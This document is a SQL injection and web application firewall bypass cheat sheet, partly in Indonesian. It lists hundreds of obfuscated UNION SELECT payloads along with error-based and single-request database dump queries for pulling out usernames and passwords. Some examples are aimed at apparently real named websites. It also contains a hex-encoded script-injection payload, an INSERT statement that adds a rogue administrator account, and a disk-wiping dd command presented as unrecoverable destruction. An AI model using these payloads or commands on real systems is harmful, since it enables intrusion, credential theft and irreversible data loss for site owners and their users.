SQL Bypass

  1. ============================
  2. === BYPASS WAF BY AKDK ===
  3. ============================
  4. --'- : +--+ / : -- - : --+- : /* : %60 : %23 : %22 : ;%00 :
  5. === ORDER+BY ===
  6. /*!ORDER BY*/
  7. /*!50000ORDER BY*/
  8. /**/ORDER/**/BY/**/
  9. /*!order*/+/*!by*/
  10. /*!50000ORDER*//**//*!50000BY*/
  11. /*!12345ORDER*/+/*!BY*/
  12.  
  13. === UNION+SELECT ===
  14. /*!UnIoN*/SeLecT+
  15. /*!union*/+/*!select*/
  16. union+/*!select*/
  17. uNiOn aLl sElEcT
  18. UNIunionON+SELselectECT
  19. /**/union/*!50000select*//**/
  20. 0%a0union%a0select%09
  21. %0Aunion%0Aselect%0A
  22. %55nion/**/%53elect
  23. /**/union/**/select/**/
  24. /**/uNIon/**/sEleCt/**/
  25. +%2F**/+Union/*!select*/
  26. /**//*!union*//**//*!select*//**/
  27. /*!uNIOn*/ /*!SelECt*/
  28. +union+distinct+select+
  29. +union+distinctROW+select+
  30. /*!00000Union*/ /*!00000Select*/
  31. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
  32. %55nion %53elect
  33. %55nion(%53elect 1,2,3)-- -
  34. +union+distinct+select+
  35. +union+distinctROW+select+
  36. /**//*!12345UNION SELECT*//**/
  37. /**//*!50000UNION SELECT*//**/
  38. /**/UNION/**//*!50000SELECT*//**/
  39. /*!50000UniON SeLeCt*/
  40. union /*!50000%53elect*/
  41. + #?uNiOn + #?sEleCt
  42. + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
  43. /*!%55NiOn*/ /*!%53eLEct*/
  44. /*!u%6eion*/ /*!se%6cect*/
  45. +un/**/ion+se/**/lect
  46. uni%0bon+se%0blect
  47. %2f**%2funion%2f**%2fselect
  48. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  49. REVERSE(noinu)+REVERSE(tceles)
  50. /*--*/union/*--*/select/*--*/
  51. union (/*!/**/ SeleCT */ 1,2,3)
  52. uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  53. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  54. %0A%09UNION%0CSELECT%10NULL%
  55. /*!union*//*--*//*!all*//*--*//*!select*/
  56. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  57. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  58. +UnIoN/*&a=*/SeLeCT/*&a=*/
  59. union+sel%0bect
  60. +uni*on+sel*ect+
  61. +#1q%0Aunion all#qa%0A#%0Aselect
  62. union(select (1),(2),(3),(4),(5))
  63. UNION(SELECT(column)FROM(table))
  64. %23akb%0AUnIOn%23akb%0ASeLecT+
  65. %23akb%0A%55nIOn%23akb%0A%53eLecT+
  66. union(select(1),2,3)
  67. union (select 1111,2222,3333)
  68. uNioN (/*!/**/ SeleCT */ 11)
  69. union (select 1111,2222,3333)
  70. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  71. /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
  72. %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
  73. +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
  74. +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  75. /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
  76. +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
  77. /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
  78. /union\sselect/g
  79. /union\s+select/i
  80. /*!UnIoN*/SeLeCT
  81. +UnIoN/*&a=*/SeLeCT/*&a=*/
  82. +uni>on+sel>ect+
  83. +(UnIoN)+(SelECT)+
  84. +(UnI)(oN)+(SeL)(EcT)
  85. +�UnI�On�+'SeL�ECT�
  86. +uni on+sel ect+
  87. +/*!UnIoN*/+/*!SeLeCt*/+
  88. /*!u%6eion*/ /*!se%6cect*/
  89. uni%20union%20/*!select*/%20
  90. union%23aa%0Aselect
  91. /**/union/*!50000select*/
  92. /^.*union.*$/ /^.*select.*$/
  93. /*union*/union/*select*/select+
  94. /*uni X on*/union/*sel X ect*/
  95. +un/**/ion+sel/**/ect+
  96. +UnIOn%0d%0aSeleCt%0d%0a
  97. UNION/*&test=1*/SELECT/*&pwn=2*/
  98. un?<ion sel="">+un/**/ion+se/**/lect+
  99. +UNunionION+SEselectLECT+
  100. +uni%0bon+se%0blect+
  101. %252f%252a*/union%252f%252a /select%252f%252a*/
  102. /%2A%2A/union/%2A%2A/select/%2A%2A/
  103. %2f**%2funion%2f**%2fselect%2f**%2f
  104. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  105.  
  106. === concat() ===
  107. concat()
  108. CON%08CAT()
  109. CoNcAt()
  110. CoNcAt()
  111. %0AcOnCat()
  112. /**//*!12345cOnCat*/
  113. /*!50000cOnCat*/(/*!*/)
  114. unhex(hex(concat(table_name)))
  115. unhex(hex(/*!12345concat*/(table_name)))
  116. unhex(hex(/*!50000concat*/(table_name)))
  117.  
  118. === group_concat() ===
  119. /*!12345group_concat*/(/*!12345table_name*/)
  120. /*!50000group_concat*/(/*!50000table_name*/)
  121. /*!GrOuP_ConCaT*/()
  122. /*!12345GroUP_ConCat*/()
  123. /*!50000gRouP_cOnCaT*/()
  124. /*!50000Gr%6fuP_c%6fnCAT*/()
  125. /*!group_concat*/()
  126. gRoUp_cOnCAt()
  127. group_concat(/*!*/)
  128. group_concat(/*!12345table_name*/)
  129. group_concat(/*!50000table_name*/)
  130. /*!group_concat*/(/*!12345table_name*/)
  131. /*!group_concat*/(/*!50000table_name*/)
  132. unhex(hex(group_concat(table_name)))
  133. unhex(hex(/*!group_concat*/(/*!table_name*/)))
  134. unhex(hex(/*!12345group_concat*/(table_name)))
  135. unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
  136. unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
  137. unhex(hex(/*!50000group_concat*/(table_name)))
  138. unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
  139. unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
  140. CONVERT(group_concat(table_name)+USING+latin1)
  141. CONVERT(group_concat(table_name)+USING+latin2)
  142. CONVERT(group_concat(table_name)+USING+latin3)
  143. CONVERT(group_concat(table_name)+USING+latin4)
  144. CONVERT(group_concat(table_name)+USING+latin5)
  145. convert(group_concat(table_name)+using+ascii)
  146. convert(group_concat(/*!table_name*/)+using+ascii)
  147. convert(group_concat(/*!12345table_name*/)+using+ascii)
  148. convert(group_concat(/*!50000table_name*/)+using+ascii)
  149.  
  150. === information_schema.tables ===
  151. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
  152. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
  153. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
  154. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
  155. /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  156. /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
  157.  
  158. === Setelah Param ID Contoh id=1 +/*!and*/+1=0 ===
  159. +div+0
  160. Having+1=0
  161. +AND+1=0
  162. +/*!and*/+1=0
  163. and(1)=(0)
  164.  
  165. === Bypass error 505/timeout ===
  166. union(select+1)
  167. union%0bselect
  168. -gunakan %0b atau /**/
  169.  
  170. NB : Ketika -- atau --+- Tidak Bekerja, Maka Gunakan ;%00 Sebagai Penggantinya.
  171.  
  172. *************************************************************************************
  173.  
  174. String Injection method
  175.  
  176. --'- : +--+ / : -- - : --+- : /*
  177. ) order by 1-- -
  178.  
  179. ') order by 1-- -
  180.  
  181. ')order by 1%23%23
  182.  
  183. %')order by 1%23%23
  184.  
  185. Null' order by 100--+
  186.  
  187. Null' order by 9999--+
  188.  
  189. ')group by 99-- -
  190.  
  191. 'group by 119449-- -
  192.  
  193. 'group/**/by/**/99%23%23
  194.  
  195. union select ByPassing method
  196.  
  197. +union+distinct+select+
  198.  
  199. +union+distinctROW+select+
  200.  
  201. /**//*!12345UNION SELECT*//**/
  202.  
  203. /**//*!50000UNION SELECT*//**/
  204.  
  205. +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  206.  
  207. +/*!u%6eion*/+/*!se%6cect*/+
  208.  
  209. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  210.  
  211. 1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
  212.  
  213. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  214.  
  215. union /*!50000%53elect*/
  216.  
  217. %55nion %53elect
  218.  
  219. +--+Union+--+Select+--+
  220.  
  221. +UnIoN/*&a=*/SeLeCT/*&a=*/
  222.  
  223. id=1+’UnI”On’+'SeL”ECT’ <-MySQL only
  224.  
  225. id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
  226.  
  227. UnIoN SeLeCt CoNcAt(version())--
  228.  
  229. uNiOn aLl sElEcT
  230.  
  231. uUNIONnion all sSELECTelect
  232.  
  233. ===================================================================================================================================
  234. :: Buffer Overflow ::
  235. ===================================================================================================================================
  236. +And(select 1)=(select 0×414)+union+select+1–
  237.  
  238. +And(select 1)=(select 0xAAAA)+union+select+1–
  239.  
  240. +And(select 1)=(select 0×
  241.  
  242. +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
  243.  
  244. ==================================================================================================================================
  245. :: 400 Bad Request ::
  246. ==================================================================================================================================
  247. –+%0A
  248.  
  249. union+select+1–+%0A,2–+%0A,3–+%0A,4–+%0A,5–+%0A –
  250.  
  251. ==================================================================================================================================
  252. null the parameter
  253. ==================================================================================================================================
  254. id=-1
  255.  
  256. id=null
  257.  
  258. id=1+and+false+
  259.  
  260. id=9999
  261.  
  262. id=1 and 0
  263.  
  264. id==1
  265.  
  266. id=(-1)
  267.  
  268. =======================================================================================================================================
  269. Group_Concat
  270. =======================================================================================================================================
  271. Group_Concat
  272.  
  273. group_concat()
  274.  
  275. /*!group_concat*/()
  276.  
  277. grOUp_ConCat(/*!*/,0x3e,/*!*/)
  278.  
  279. group_concat(,0x3c62723e)
  280.  
  281. g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29
  282.  
  283. CoNcAt()
  284.  
  285. CONCAT(DISTINCT Version())
  286.  
  287. concat(,0x3a,)
  288.  
  289. concat%00()
  290.  
  291. %00CoNcAt()
  292.  
  293. /*!50000cOnCat*/(/*!Version()*/)
  294.  
  295. /*!50000cOnCat*/
  296.  
  297. /**//*!12345cOnCat*/(,0x3a,)
  298.  
  299. concat_ws()
  300.  
  301. concat(0x3a,,0x3c62723e)
  302.  
  303. /*!concat_ws(0x3a,)*/
  304.  
  305. concat_ws(0x3a3a3a,version()
  306.  
  307. CONCAT_WS(CHAR(32,58,32),version(),)
  308.  
  309. REVERSE(tacnoc)
  310.  
  311. binary(version())
  312.  
  313. uncompress(compress(version()))
  314.  
  315. aes_decrypt(aes_encrypt(version(),1),1)
  316.  
  317. ====================================================================================================================================
  319. To make the column number appear in the page, put this after the id
  319. ====================================================================================================================================
  320. id=1+and+1=0+union+select+1,2,3,4,5,6
  321.  
  322. +AND+1=0
  323.  
  324. /*!aND*/ 1 like 0
  325.  
  326. +/*!and*/+1=0
  327.  
  328. +and+2>3+
  329.  
  330. +and(1)=(0)
  331.  
  332. and (1)!=(0)
  333.  
  334. +div+0
  335.  
  336. Having+1=0
  337.  
  338. ===================================================================================================================================
  339. function ByPassing
  340. ===================================================================================================================================
  341. unhex(hex(value))
  342.  
  343. cast(value as char)
  344.  
  345. uncompress(compress(version()))
  346.  
  347. cast(version() as char)
  348.  
  349. aes_decrypt(aes_encrypt(version(),1),1)
  350.  
  351. binary(version())
  352.  
  353. convert(value using ascii)
  354.  
  355. ===================================================================================================================================
  356. avoid source page injection
  357. ===================================================================================================================================
  358. concat(?”>,<br><br><br>,@@version,?<img src=”,?<?’#)
  359.  
  360. “><br>? <img src=”
  361.  
  362. <img src=””/>injection<img src=”
  363.  
  364. concat(0x223e,@@version)
  365.  
  366. concat(0x273e27,version(),0x3c212d2d)
  367.  
  368. concat(0x223e3c62723e,version(),0x3c696d67207372633d22)
  369.  
  370. concat(0x223e,@@version,0x3c696d67207372633d22)
  371.  
  372. concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62723e)
  373.  
  374. concat(0x223e3c62723e,@@version,0x3a,”BlackRose”,0x3c696d67207372633d22)
  375.  
  376. concat(‘</title>’,@@version,’<title>’)
  377.  
  378. concat(0x273c2f7469746c653e27,@@version,0x273c7469746c653e27)
  379.  
  380. concat(0x273c2f7469746c653e27,version(),0x273c7469746c653e27)
  381.  
  382. ===================================================================================================================================
  383. get version – DB_NAME – user – HOST_NAME – datadir
  384. ===================================================================================================================================
  385. version()
  386.  
  387. convert(version() using latin1)
  388.  
  389. unhex(hex(version()))
  390.  
  391. @@GLOBAL.VERSION
  392.  
  393. (substr(@@version,1,1)=5) :: 1 true 0 false
  394.  
  395. # like #
  396.  
  397. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(substr(@@version,1,1)=5),4,5 –
  398.  
  399. ==================================================================================================================================
  400. +and substring(version(),1,1)=4
  401.  
  402. +and substring(version(),1,1)=5
  403.  
  404. +and substring(version(),1,1)=9
  405.  
  406. +and substring(version(),1,1)=10
  407.  
  408. id=1 /*!50094aaaa*/ error
  409.  
  410. id=1 /*!50095aaaa*/ no error
  411.  
  412. id=1 /*!50096aaaa*/ error
  413.  
  414. # like # http://www.marinaplast.com/page.php?id=13 /*!50095aaaa*/
  415.  
  416. id=1 /*!40123 1=1*/–+- no error
  417.  
  418. id=1 /*!40122rrrr*/ no error
  419.  
  420. # like # http://www.marinaplast.com/page.php?id=13 /*!40122rrrr*/ error not v4
  421. =================================================================================================================================
  422. DB_NAME()
  423. =================================================================================================================================
  424. @@database
  425. database()
  426. id=vv()
  427. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,DB_NAME(),4,5 –
  428. http://www.marinaplast.com/page.php?id=vv()
  429. @@user
  430. user()
  431. user_name()
  432. system_user()
  433. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,user(),4,5 –
  434.  
  435. HOST_NAME()
  436. @@hostname
  437. @@servername
  438. SERVERPROPERTY()
  439.  
  440. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,HOST_NAME(),4,5 –
  441. @@datadir
  442. datadir()
  443. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,datadir(),4,5 –
  444. ASPX
  445. and 1=0/@@version
  446. ‘ and 1=0/@@version;–
  447. ‘) and 1=@@version–
  448. and 1=0/user;–
  449.  
  450. Requested method
  451. [DUMP DB in 1 Request]
  452.  
  453. (select (@) from (select(@:=0×00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name))))x)
  454.  
  455. (select(@) from (select (@:=0×00),(select (@) from (table) where (@) in (@:=concat(@,0x0a,column1,0x3a,column2))))a)
  456. ===================================================================================================================================
  457. [DUMP DB in 1 Request improve]
  458. ===================================================================================================================================
  459.  
  460. (select(@x)from(select(@x:=0×00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0×00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)
  461.  
  462. like
  463. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.colu mns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0×00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 –
  464. ===================================================================================================================================
  465. #2#
  466. ===================================================================================================================================
  467. method like DUMP DB in 1 Request
  468. ===================================================================================================================================
  469. concat(@i:=0×00,@o:=0xd0a,benchmark(40,@o:=CONCAT( @o,0xd0a,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1)))
  470. like
  471. http://www.mishnetorah.com/shop/details.php…(@i:=0×00,@o:=0xd0a,benchmark(40,@o:=CONCAT(@o,0xd0a ,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1))),@o),5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21
  472. ===================================================================================================================================
  473. #3#
  474. ===================================================================================================================================
  475. databases
  476.  
  477. (select+count(schema_name) +from+information_schema.schemata)
  478.  
  479. # like #
  480. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(schema_name) +from+information_schema.schemata),4,5 –
  481.  
  482. tables
  483. (select+count(table_name) +from+information_schema.tables)
  484. # like #
  485. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(table_name) +from+information_schema.tables),4,5 –
  486.  
  487. columns
  488. (select+count(column_name) +from+information_schema.columns)
  489. # like #
  490. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(column_name) +from+information_schema.columns),4,5 –
  491. ===================================================================================================================================
  492. #4#
  493. ===================================================================================================================================
  494. show the table with all its columns
  495.  
  496. CONCAT(table_name,0x3e,GROUP_CONCAT(column_name))
  497.  
  498. +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 1,1–+
  499.  
  500. like
  501. http://www.marinaplast.com/page.php?id=-13 union select 1,2,CONCAT(table_name,0x3e,GROUP_CONCAT(column_name)),4,5 +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 0,1–+
  502. ===================================================================================================================================
  503. #5#WWWWWWWWWWWAAAAAAAAAAAAAAAAAAFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
  504. ===================================================================================================================================
  505. filtered requests
  506.  
  507. # tables #
  508. group_concat(/*!table_name*/)
  509.  
  510. +/*!froM*/ /*!InfORmaTion_scHema*/.tAblES– -
  511.  
  512. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()– -
  513.  
  514. /*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()– -
  515. ===================================================================================================================================
  516. # columns #
  517. ===================================================================================================================================
  518. group_concat(/*!column_name*/)
  519.  
  520. +/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table
  521.  
  522. /*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  523.  
  524. /*!froM*/ table– -
  525. ===================================================================================================================================
  526. #6#
  527. ===================================================================================================================================
  528. bypass method
  529.  
  530. (select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA())
  531.  
  532. (select+group_concat(/*!column_name*/)+/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table)
  533.  
  534. like
  535. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()),4,5 –
  536. ===================================================================================================================================
  537. #7#
  538. ===================================================================================================================================
  539. bypass method
  540.  
  541. unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))
  542.  
  543. /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)
  544.  
  545. like
  546. http://www.marinaplast.com/page.php?id=-13 union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)–
  547.  
  548. ===================================================================================================================================
  549. [+] Union Select:
  550. ===================================================================================================================================
  551. union /*!select*/+
  552. union/**/select/**/
  553. /**/union/**/select/**/
  554. /**/union/*!50000select*/
  555. /**//*!12345UNION SELECT*//**/
  556. /**//*!50000UNION SELECT*//**/
  557. /**/uniUNIONon/**/selSELECTect/**/
  558. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  559. /**//*!union*//**//*!select*//**/
  560. /**/UNunionION/**/SELselectECT/**/
  561. /**//*UnIOn*//**//*SEleCt*//**/
  562. /**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  563. /**/UNunionION/**/all/**/SELselectECT/**/
  564. /**//*UnIOn*//**/all/**//*SEleCt*//**/
  565. /**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  566. uni<on all sel<ect
  567. %20union%20/*!select*/%20
  568. union%23aa%0Aselect
  569. union+distinct+select+
  570. union+distinctROW+select+
  571. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  572. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  573. %23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+
  574. /*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  575. /*!u%6eion*/+/*!se%6cect*/+
  576. 1%’)and(0)union(select(1),version(),3,4,5,6)%23%23%23
  577. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  578. union /*!50000%53elect*/
  579. +%2F**/+Union/*!select*/
  580. %55nion %53elect
  581. +–+Union+–+Select+–+
  582. +UnIoN/*&a=*/SeLeCT/*&a=*/
  583. uNiOn aLl sElEcT
  584. uUNIONnion all sSELECTelect
  585. union(select(1),2,3)
  586. union (select 1111,2222,3333)
  587. union (/*!/**/ SeleCT */ 11)
  588. %0A%09UNION%0CSELECT%10NULL%
  589. /*!union*//*–*//*!all*//*–*//*!select*/
  590. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  591. union+sel%0bect
  592. +uni*on+sel*ect+
  593. +#1q%0Aunion all#qa%0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#a
  594. union(select (1),(2),(3),(4),(5))
  595. UNION(SELECT(column)FROM(table))
  596. id=1+’UnI”On’+’SeL”ECT’ <-MySQL only
  597. id=1+’UnI’||’on’+SeLeCT’ <-MSSQL only
  598. union select 1–+%0A,2–+%0A,3–+%0A etc ….
  599. ===================================================================================================================================
  600. [+] Buffer overflow:
  601. ===================================================================================================================================
  602. +And(select 1)=(select 0×414)+union+select+1–
  603. +And(select 1)=(select 0xAAAA)+union+select+1–
  604. +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
  605. +and (/*!select*/ 1)=(/*!select*/ 0×414)+
  606. +And(select 1)=(select 0×4141414141414141414141414141414141414141414141414141414141414141414141414?1414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 1414141414141414141414141414141414141414141414141414141414141414141414141414?141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 4141)+
  607. ===================================================================================================================================
  608. [+] Group Concat:
  609. ===================================================================================================================================
  610. Group_Concat
  611. group_concat()
  612. /*!group_concat*/()
  613. grOUp_ConCat(/*!*/,0x3e,/*!*/)
  614. group_concat(,0x3c62723e)
  615. g%72oup_c%6Fncat%28%76%65rsion%28%29,%22testtest%22%29
  616. CoNcAt()
  617. CONCAT(DISTINCT Version())
  618. concat(,0x3a,)
  619. concat%00()
  620. %00CoNcAt()
  621. /*!50000cOnCat*/(/*!Version()*/)
  622. /*!50000cOnCat*/
  623. /**//*!12345cOnCat*/(,0x3a,)
  624. concat_ws()
  625. concat(0x3a,,0x3c62723e)
  626. /*!concat_ws(0x3a,)*/
  627. concat_ws(0x3a3a3a,version()
  628. CONCAT_WS(CHAR(32,58,32),version(),)
  629. ===================================================================================================================================
  630. ERROR BASED
  631. ===================================================================================================================================
  632. =21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1–
  633.  
  634. Database
  635.  
  636. 21 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  637.  
  638. Table_name
  639.  
  640. and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  641.  
  642. Columns
  643.  
  644. 21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  645.  
  646. extract data
  647.  
  648. http://www.aliqbalschools.org/index.php… and (select 1 from (select count(*),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  649.  
  650. Notice the limit function in the query
  651. A website can have more than two databases, so increase the limit until you find all database names
  652. Example: limit 0,1 or limit 1,1 or limit 2,1
  653. ===================================================================================================================================
  654. Differences:
  655. Error Based Query for Database Extraction:
  656. ===================================================================================================================================
  657. and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  658.  
  659. Double Query for Database Extraction:
  660.  
  661. and(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,cast(database() as char),0×27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
  662. information_schema.tables group by x)a) and 1=1
  663.  
  664. and(select 1 from(select count(*),concat((select (select (SELECT distinct
  665. concat(0x7e,0×27,cast(schema_name as char),0×27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
  666. information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
  667.  
  668. and(select 1 from(select count(*),concat((select (select (SELECT distinct
  669. concat(0x7e,0×27,cast(table_name as char),0×27,0x7e) FROM information_schema.tables Where
  670. table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
  671. information_schema.tables group by x)a) and 1
  672. ===================================================================================================================================
  673. WUBI +and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,password)+from+iw_users+limit+0,1)))–+
  674. ===================================================================================================================================
  675.  
  676. Descarci orice linux live, bootezi dupa el si formatezi cu dd+urandom. De acolo nu mai recupereaza NIMENI ceva.
  677. Code: dd if=/dev/urandom of=/dev/sda bs=1M
  678.  
  679. I’d say using concat(0xY)
  680.  
  681. Y being ‘<script>alert(‘Text here’);</script>’ in hex
  682. union select concat(version,0x3c7363726970743e616c6572742827706833776c27293c2f7363726970743e)
  683.  
  684. http://zerocoolhf.altervista.org/level2.php…
  685.  
  686. union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name=concat(’0x’, hex(‘users’)
  687.  
  688. =113′+and+0+union+select+1,(SELECT (@) FROM (SELECT(@:=0×00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x3C7363726970743E616C6572742827,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name,0x27293B3C2F7363726970743E))))x),3–+–
  689.  
  690. injection in sql database: add new user
  691. INSERT INTO admins (`name`,`password`,`email`) VALUES (‘unix’,'unixunix’,'unix_chro@yahoo.com’)
  692.  
  693. +and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_nam e+as+char),0x7e))+from+information_schema.tables+where+table_schema=0xDATABASEHE X+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
  694.  
  695. CHALLENGES
  696.  
  697. Code:
  698. =(13)and(0)union(select(1),group_concat(column_name,0x3c62723e),(3)from(information_schema.columns)where(table_schema=database())and(table_name=0×7365637572697479))–+-
  699. =12+and+false/*!union*/ /*!select*/1,group_concat(0x3c62723e,/*!TabLe_NaMe*/),2,concat(user(),0x2a,database(),0x2a,version()),13,0x3c666f6e7420636f6c6f723d626c75653e3c68323e706833776c,15 from information_schema.tables where table_schema=0x66616272697a696f5f636572697070 LiMit 0,1–
  700. =/*!uNiOn*/ /*!SeLeCt*/ 1,concat(/*!version(),0x3a,0x3a,AdMinLoGiN,0x3a,0x3a*/),3 /*!fRoM*/ security--
  701. =121)+and(0)+/*!uNion*/+/*!seleCt*/+1,2,3,4,version(),6,7-- -
  702. =121)/**/and false UNION(SELECT 1,2,3,4,5,6,7)--+-
  703. =121 div 0 ) /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,version()# |
  704. null'+union+select+1,2,count(schema_name),4,5+from+information_schema.schemata-- x
  705. ===================================================================================================================================
  706. Error Based:
  707. ===================================================================================================================================
  708. +or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--
  709.  
  710. or 1 group by concat(0x3a,(select substr(group_concat(username,0x3a,password),1,150)
  711.  
  712. from rmdsz_user),floor(rand(0)*2)) having min(0) or 1-- -   (continuation of the payload started two lines above)
